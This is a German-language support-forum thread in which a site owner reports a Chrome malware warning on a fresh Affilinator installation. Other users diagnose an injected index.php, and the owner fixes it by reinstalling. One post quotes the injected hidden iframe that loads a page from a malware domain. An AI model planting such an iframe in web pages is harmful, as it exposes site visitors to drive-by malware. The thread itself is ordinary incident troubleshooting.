![]() |
Startseite
Forum
Affilinator kostenlos
Impressum
alte Dokumentation
|
|
|||||||
| Fehlersuche und Probleme Sollten beim Betrieb Probleme auftauchen oder wenn Sie einen Bug entdeckt haben, sagen Sie es uns hier. Wenn es sich um einen Bug handelt wird ein Moderator Ihr Thema in das 'Bestätigte Bugs und Probleme' Forum verschieben. Bitte IMMER einen Link zum fehler angeben! Wenn möglich auch gleich Angaben zum Provider und Paket! |
![]() |
|
|
Themen-Optionen | Ansicht |
|
|
|||
|
|||
|
Plötzlich kommt heute diese Warnung auf meiner frischen Installation im Chrome:
Warnung: Irgendetwas stimmt hier nicht! www.nominatim.de enthält Inhalte von ejipaohemcp.com, einer Website, die bekanntermaßen Malware enthält. Ihr Computer fängt sich möglicherweise einen Virus ein, wenn Sie diese Website besuchen. ... jemand eine Idee ... www.nominatim.de |
|
|
|||
|
|||
|
2. Meldung:
Der ionCube Loader ioncube_loader_lin_5.2.so ist nicht korrekt installiert. Informationen zur Installation finden Sie in der Dokumentation oder im IonCube-Loader-Helper. |
|
|
||||
|
||||
|
Hallo,
das sieht so aus, als ob deine index.php auf deinem Webspace manipuliert wurde. Kontrolliere das doch mal. Gruß Axel
|
|
|
|||
|
|||
|
Ich hab die index.php neu rauf geladen .. der Fehler geht aber nicht weg und die Warnung bleibt erhalten ... damn ... wie kann es denn sein, dass es plötzlich nicht mehr get nach 3 Tagen ...
|
|
|
|||
|
|||
|
Ich hab nen Iframe plötzlich auf der Seite ... wo soll das herkommen? wo steck das drin?
<iframe width="100" height="2" src="http://cfgrucicmcp.com/index.php?tp=001e4bb7b4d7333d" name="I1"> </iframe> |
|
|
||||
|
||||
|
Hi,
scheint ja wieder zu funktionieren. Was war es den? Gruß Axel
|
|
|
|||
|
|||
|
Hallo, Axel ...
Ich hab`s neu installiert und die gesicherte Datenbank eingespielt ... mal warten wie lange das so bleibt. Danke schön erstmal. |
|
|
|||
|
|||
|
IFrame Trojaner / Virus.
Da gab es mal was, aber sorry, ich erinnere mich auch nicht mehr an Details, aber du hast dir da wahrscheinlich was eingefangen. Gruß Frank
| Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1) | |
| Themen-Optionen | |
| Ansicht | |
|
|